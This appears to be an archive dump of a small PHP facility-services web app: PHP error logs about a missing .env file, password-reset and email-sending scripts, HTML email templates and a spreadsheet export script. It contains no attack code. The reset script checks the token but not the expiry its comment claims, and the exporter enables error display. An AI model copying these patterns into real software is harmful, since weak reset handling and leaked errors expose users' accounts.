Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [10-Oct-2025 08:31:55 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 06:53:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 06:53:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 06:53:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [11-Oct-2025 06:54:01 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [14-Oct-2025 10:32:21 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 06:10:21 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [15-Apr-2026 06:10:51 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 06:10:57 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 06:11:00 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 06:11:05 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 09:20:38 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 09:20:51 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 09:24:17 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [15-Apr-2026 09:24:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 09:25:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 09:32:59 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 10:57:02 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Apr-2026 10:57:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 update_password.php000064400000002072151676701240010473 0ustar00<?php require_once '../Classes/Database.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $token = $_POST['token']; $newPassword = password_hash($_POST['new_password'], PASSWORD_DEFAULT); $db = new Database(); // Check if token is valid and not expired $db->query('SELECT user_id FROM password_resets WHERE token = :token '); $db->bind(':token', $token); $resetRecord = $db->single(); if ($resetRecord) { $userId = $resetRecord->user_id; // Update the user's password $db->query('UPDATE users SET password = :password WHERE id = :id'); $db->bind(':password', $newPassword); $db->bind(':id', $userId); $db->execute(); // Delete the reset token so it can't be used again $db->query('DELETE FROM password_resets WHERE token = :token'); $db->bind(':token', $token); $db->execute(); echo "Password updated successfully"; } else { echo "Invalid or expired token"; } } else { echo "Invalid request"; } ?> send_email_to_workers.php000064400000013601151676701240011645 0ustar00<?php //load .env file require_once '../vendor/autoload.php'; $dotenv = Dotenv\Dotenv::createImmutable(__DIR__ . '/../'); $dotenv->load(); //set base url $base_url = $_ENV['BASE_URL']; require_once 'emailUtils.php'; // Ensure this file contains your sendEmail function require_once '../Classes/Database.php'; // Adjust path as per your project structure require_once '../Service/SubtaskService.php'; // Adjust path as per your project structure require_once '../Service/TaskService.php'; use PHPMailer\PHPMailer\Exception; use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $data = json_decode(file_get_contents("php://input"), true); $action = isset($data['action']) ? $data['action'] : null; $email = isset($data['worker_email']) ? $data['worker_email'] : null; $subtaskIds = isset($data['subtask_ids']) ? $data['subtask_ids'] : []; $subtaskService = new SubtaskService(); $errors = []; $successes = []; if ($action === 'single') { $subtaskId = isset($data['subtask_id']) ? $data['subtask_id'] : null; if ($subtaskId !== null) { $subtask = $subtaskService->getSubtaskById($subtaskId); if ($subtask) { // Load email template for single subtask $templatePath = 'email_templates/subtask_email_template.html'; $emailTemplate = file_get_contents($templatePath); // Replace placeholders with subtask data $placeholders = [ "Recipient's Name" => $email, 'Service Name' => $subtask->service_name, 'Date' => $subtask->date, 'Time' => $subtask->time, 'taskFormLink' => $base_url.'/pages/subtaskform.php?subtask_id=' . $subtask->id, ]; foreach ($placeholders as $key => $value) { $emailTemplate = str_replace("[$key]", $value, $emailTemplate); } // Send email $result = sendEmail($email, "New Task Assigned: " . $subtask->service_name, $emailTemplate); if (strpos($result, 'Email sent') !== false) { $successes[] = "Email sent to $email for subtask ID $subtaskId"; // Update database after successful email $updateResult = $subtaskService->updateSubtaskStatusAfterMessage($subtaskId, $email, 'success'); if ($updateResult) { $successes[] = "Database updated for subtask ID $subtaskId"; } else { $errors[] = "Failed to update database for subtask ID $subtaskId"; } } else { $errors[] = "Failed to send email to $email for subtask ID $subtaskId: $result"; } } else { $errors[] = "Subtask not found for ID $subtaskId"; } } else { $errors[] = "Missing subtask ID for single action"; } } elseif ($action === 'bulk') { foreach ($subtaskIds as $subtaskId) { $subtask = $subtaskService->getSubtaskById($subtaskId); // Check if taskAssigned is true $taskService = new TaskService(); $isTaskAssigned = $taskService->isTaskAssignedAndAccepted($subtask->id); if (!$isTaskAssigned) { echo json_encode(['status' => 'error', 'message' => 'Please assign the task before sending a subtask to the cleaner.']); exit; } if ($subtask) { // Load email template for bulk subtasks $templatePath = 'email_templates/subtask_email_template.html'; $emailTemplate = file_get_contents($templatePath); // Replace placeholders with subtask data $placeholders = [ "Recipient's Name" => $email, 'Service Name' => $subtask->service_name, 'Date' => $subtask->subtask_date, 'Time' => date("g:i A", strtotime($subtask->subtask_time)), 'taskFormLink' => $base_url.'/pages/subtaskform.php?subtask_id=' . $subtask->id, ]; foreach ($placeholders as $key => $value) { $emailTemplate = str_replace("[$key]", $value, $emailTemplate); } // Send email $result = sendEmail($email, "New Task Assigned: " . $subtask->service_name, $emailTemplate); if (strpos($result, 'Email sent') !== false) { $successes[] = "Email sent to $email for subtask ID $subtaskId"; // Update database after successful email $updateResult = $subtaskService->updateSubtaskStatusAfterMessage($subtaskId, $email, 'success'); if ($updateResult) { $successes[] = "Database updated for subtask ID $subtaskId"; } else { $errors[] = "Failed to update database for subtask ID $subtaskId"; } } else { $errors[] = "Failed to send email to $email for subtask ID $subtaskId: $result"; } } else { $errors[] = "Subtask not found for ID $subtaskId"; } } } else { $errors[] = "Invalid action parameter: $action"; } if (empty($errors)) { echo json_encode(['status' => 'success', 'message' => $successes]); } else { echo json_encode(['status' => 'partial', 'successes' => $successes, 'errors' => $errors]); } } else { echo json_encode(['status' => 'error', 'message' => 'Invalid request method']); } ?> emailUtils.php000064400000002456151676701240007405 0ustar00<?php require __DIR__ . '/../vendor/autoload.php'; use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\Exception; // Function to send email function sendEmail($to, $subject, $body, $isHTML = true, $template = null, $placeholders = []) { $mail = new PHPMailer(true); try { // Server settings $mail->isSMTP(); $mail->Host = 'localhost'; $mail->SMTPAuth = false; $mail->SMTPAutoTLS = false; $mail->Port = 25; // Recipients $mail->setFrom('mail@emerateamkids.com', 'emerateamkids.com'); // Replace with your GoDaddy email and name $mail->addAddress($to); // Load and process HTML email template if provided if ($template) { $emailTemplate = file_get_contents($template); foreach ($placeholders as $key => $value) { $emailTemplate = str_replace("[$key]", $value, $emailTemplate); } $body = $emailTemplate; } // Content $mail->isHTML($isHTML); $mail->Subject = $subject; $mail->Body = $body; $mail->send(); return "Email sent to $to"; } catch (Exception $e) { return "Message could not be sent. Mailer Error: {$mail->ErrorInfo}"; } } ?> email_templates/password_reset_template.html000064400000005162151676701240015553 0ustar00<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Password Reset Request</title> <style> body { font-family: Arial, sans-serif; background-color: #f9f9f9; color: #333; margin: 0; padding: 0; } .container { width: 100%; max-width: 600px; margin: 0 auto; padding: 20px; background-color: #ffffff; border: 1px solid #e0e0e0; box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1); } .header { text-align: left; padding-bottom: 20px; } .header img { max-width: 150px; height: auto; } .content { line-height: 1.6; } .button { display: inline-block; padding: 10px 20px; margin-top: 20px; background-color: #007bff; color: #ffffff; text-decoration: none; border-radius: 5px; } .footer { margin-top: 20px; font-size: 12px; color: #777; } </style> </head> <body> <div class="container"> <div class="header"> <img src="https://emerafs.com.au/wp-content/uploads/2023/07/Emera-Primary-Logo-Color-e1691736085254.png" alt="Company Logo"> </div> <div class="content"> <p>Dear [Recipient's Name],</p> <p>We received a request to reset the password associated with this email address. If you made this request, please click the button below to reset your password:</p> <p><a href="[Reset Password Link]" class="button">Reset Password</a></p> <p>If you did not request a password reset, please ignore this email. Your account will remain secure and no changes will be made.</p> <p>For security reasons, the link will expire in [expiration time, e.g., 24 hours]. If you need further assistance, please do not hesitate to contact our support team.</p> </div> <div class="footer"> <p>Best regards,</p> <p>[EMERA FACILITY SERVICE]</p> <hr> <p><strong>Important:</strong></p> <ul> <li>Do not share your password with anyone.</li> <li>Ensure that your password is strong and unique to maintain your account security.</li> </ul> </div> </div> </body> </html> email_templates/task_email_template.html000064400000004324151676701240014617 0ustar00<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Service Confirmation Request</title> <style> body { font-family: Arial, sans-serif; background-color: #f9f9f9; color: #333; margin: 0; padding: 0; } .container { width: 100%; max-width: 600px; margin: 0 auto; padding: 20px; background-color: #ffffff; border: 1px solid #e0e0e0; box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1); } .header { text-align: left; padding-bottom: 20px; } .header img { max-width: 150px; height: auto; } .content { line-height: 1.6; } .button { display: inline-block; padding: 10px 20px; margin-top: 20px; background-color: #007bff; color: #ffffff; text-decoration: none; border-radius: 5px; } .footer { margin-top: 20px; font-size: 12px; color: #777; } </style> </head> <body> <div class="container"> <div class="header"> <img src="https://emerafs.com.au/wp-content/uploads/2023/07/Emera-Primary-Logo-Color-e1691736085254.png" alt="Company Logo"> </div> <div class="content"> <p>Dear [Recipient's Name],</p> <p>Please find the attached details for the upcoming service, including the service location, dates, and frequency.</p> <p>Service Location: [Service Location Name]</p> <p>Dates: [Dates]</p> <p>Frequency: [Frequency]</p> <p><a href="[taskFormLink]" class="button">Fill out the form</a></p> </div> <div class="footer"> <p>Best regards,</p> <p>[EMERA FACILITY SERVICE]<br> </p> <hr> <p><strong>Important:</strong></p> <ul> <li>Do not share your email with anyone.</li> </ul> </div> </div> </body> </html> email_templates/subtask_email_template.html000064400000004243151676701240015331 0ustar00<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Service Confirmation Request</title> <style> body { font-family: Arial, sans-serif; background-color: #f9f9f9; color: #333; margin: 0; padding: 0; } .container { width: 100%; max-width: 600px; margin: 0 auto; padding: 20px; background-color: #ffffff; border: 1px solid #e0e0e0; box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1); } .header { text-align: left; padding-bottom: 20px; } .header img { max-width: 150px; height: auto; } .content { line-height: 1.6; } .button { display: inline-block; padding: 10px 20px; margin-top: 20px; background-color: #007bff; color: #ffffff; text-decoration: none; border-radius: 5px; } .footer { margin-top: 20px; font-size: 12px; color: #777; } </style> </head> <body> <div class="container"> <div class="header"> <img src="https://emerafs.com.au/wp-content/uploads/2023/07/Emera-Primary-Logo-Color-e1691736085254.png" alt="Company Logo"> </div> <div class="content"> <p>Dear [Recipient's Name],</p> <p>Please find the attached details for the upcoming service, including the date, time, and location:</p> <p>Service Location: [Service Name]</p> <p>Date: [Date]</p> <p>Time: [Time]</p> <p><a href="[taskFormLink]" class="button">Fill out the form</a></p> </div> <div class="footer"> <p>Best regards,</p> <p>[EMERA FACILITY SERVICE]</p> <hr> <p><strong>Important:</strong></p> <ul> <li>Do not share your email with anyone.</li> </ul> </div> </div> </body> </html> emeraadmin/export_schedule.php000064400000014543151676701240012574 0ustar00<?php // Enable error reporting ini_set('display_errors', 1); ini_set('display_startup_errors', 1); // Include Composer's autoload file to load PHPSpreadsheet require '../../vendor/autoload.php'; require_once __DIR__ . '/../../Classes/Database.php'; use PhpOffice\PhpSpreadsheet\Spreadsheet; use PhpOffice\PhpSpreadsheet\Style\Color; use PhpOffice\PhpSpreadsheet\Style\Fill; use PhpOffice\PhpSpreadsheet\Writer\Xlsx; // Function to export schedule tasks to Excel and return file contents function exportScheduleToExcel($scheduleId) { // Establish database connection (replace with your connection logic) $db = new Database(); $pdo = $db->getConn(); // SQL query to fetch tasks with subtask dates and times formatted $sql = " SELECT srv.name AS service_name, srv.region, t.frequency, st.subtask_date, st.completed, st.ignored FROM tasks t JOIN subtasks st ON t.id = st.task_id JOIN services srv ON t.service_id = srv.id WHERE t.schedule_id = :schedule_id ORDER BY srv.name, srv.region, t.frequency, st.subtask_date "; $stmt = $pdo->prepare($sql); $stmt->bindValue(':schedule_id', $scheduleId, PDO::PARAM_INT); $stmt->execute(); $tasks = $stmt->fetchAll(PDO::FETCH_ASSOC); // Create a new Spreadsheet object $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); // Set headers or titles in the Excel sheet $sheet->setCellValue('A1', 'Service Name'); $sheet->setCellValue('B1', 'Region'); $sheet->setCellValue('C1', 'Frequency'); // Get all distinct subtask dates $distinctDates = []; foreach ($tasks as $task) { $distinctDates[] = $task['subtask_date']; } $distinctDates = array_unique($distinctDates); sort($distinctDates); // Set dates as headers in the Excel sheet $col = 'D'; foreach ($distinctDates as $date) { $sheet->setCellValue($col . '1', $date); $sheet->getColumnDimension($col)->setWidth(15); // Set width to 15 $col++; } // Populate tasks data into Excel $row = 2; $taskGroups = []; foreach ($tasks as $task) { $taskKey = $task['service_name'] . '-' . $task['region'] . '-' . $task['frequency']; if (!isset($taskGroups[$taskKey])) { $taskGroups[$taskKey] = [ 'service_name' => $task['service_name'], 'region' => $task['region'], 'frequency' => $task['frequency'], 'subtasks' => [] ]; } $taskGroups[$taskKey]['subtasks'][$task['subtask_date']] = ['completed' => $task['completed'], 'ignored' => $task['ignored']]; } foreach ($taskGroups as $taskGroup) { $sheet->setCellValue('A' . $row, $taskGroup['service_name']); $sheet->setCellValue('B' . $row, $taskGroup['region']); $sheet->setCellValue('C' . $row, $taskGroup['frequency']); // Populate subtask statuses $col = 'D'; foreach ($distinctDates as $date) { $value = ''; $styleArray = null; if (isset($taskGroup['subtasks'][$date])) { $completed = $taskGroup['subtasks'][$date]['completed']; $ignored = $taskGroup['subtasks'][$date]['ignored']; if ($ignored) { $value = 'Ignored'; $styleArray = [ 'fill' => [ 'fillType' => Fill::FILL_SOLID, 'color' => ['rgb' => 'FFFF00'] ], 'font' => [ 'color' => ['rgb' => '9C6500'] ] ]; } elseif ($completed) { $value = 'Completed'; $styleArray = [ 'fill' => [ 'fillType' => Fill::FILL_SOLID, 'color' => ['rgb' => 'C6EFCE'] ], 'font' => [ 'color' => ['rgb' => '006100'] ] ]; } else { $value = 'Not Completed'; $styleArray = [ 'fill' => [ 'fillType' => Fill::FILL_SOLID, 'color' => ['rgb' => 'FFC7CE'] ], 'font' => [ 'color' => ['rgb' => '9C0006'] ] ]; } } // Set value in corresponding cell $cellCoordinate = $col . $row; $sheet->setCellValue($cellCoordinate, $value); // Apply style if applicable if ($styleArray) { $sheet->getStyle($cellCoordinate)->applyFromArray($styleArray); } $col++; } $row++; } // Set column widths (optional) $sheet->getColumnDimension('A')->setWidth(25); // Adjust width as needed $sheet->getColumnDimension('B')->setWidth(20); $sheet->getColumnDimension('C')->setWidth(15); // Set headers for Excel file download header('Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'); header('Content-Disposition: attachment;filename="schedule_export_' . date('Y-m-d') . '.xlsx"'); header('Cache-Control: max-age=0'); // Save Excel file to PHP output (browser will download it) $writer = new Xlsx($spreadsheet); $writer->save('php://output'); } // Check if schedule_id is provided via GET request if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['schedule_id'])) { $scheduleId = $_GET['schedule_id']; try { // Export schedule to Excel and initiate download exportScheduleToExcel($scheduleId); exit; // Stop further execution after file download } catch (Exception $e) { // Handle exceptions (e.g., database errors, file saving errors) echo 'Error: ' . $e->getMessage(); } } else { // Handle case where schedule_id parameter is missing echo 'Error: Schedule ID parameter missing.'; } ?> emeraadmin/error_log000064400003532361151676701240010611 0ustar00[15-Jul-2024 10:40:28 UTC] PHP Fatal error: Uncaught Error: Call to undefined method TaskService::getAllIncompletedSubtaksGroupByDate() in /home/ftmgc76wdee4/public_html/pages/emeraadmin/submitsubtaskmanually.php:24 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/emeraadmin/submitsubtaskmanually.php on line 24 [15-Jul-2024 10:40:59 UTC] PHP Fatal error: Uncaught Error: Call to undefined method TaskService::getAllIncompletedSubtaksGroupByDate() in /home/ftmgc76wdee4/public_html/pages/emeraadmin/submitsubtaskmanually.php:24 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/emeraadmin/submitsubtaskmanually.php on line 24 [15-Jul-2024 10:42:22 UTC] PHP Warning: Undefined property: stdClass::$submitted_by_admin in /home/ftmgc76wdee4/public_html/pages/emeraadmin/viewsubtask.php on line 171 [15-Jul-2024 10:42:48 UTC] PHP Warning: Undefined property: stdClass::$submitted_by_admin in /home/ftmgc76wdee4/public_html/pages/emeraadmin/viewsubtask.php on line 171 [15-Jul-2024 10:44:23 UTC] PHP Warning: Undefined property: stdClass::$submitted_by_admin in /home/ftmgc76wdee4/public_html/pages/emeraadmin/viewsubtask.php on line 171 [16-Jul-2024 14:22:54 UTC] PHP Fatal error: Uncaught Error: Call to undefined method TaskService::getAllSubtasksWithNotesGroupByDate() in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaskswithnotes.php:30 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 30 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array 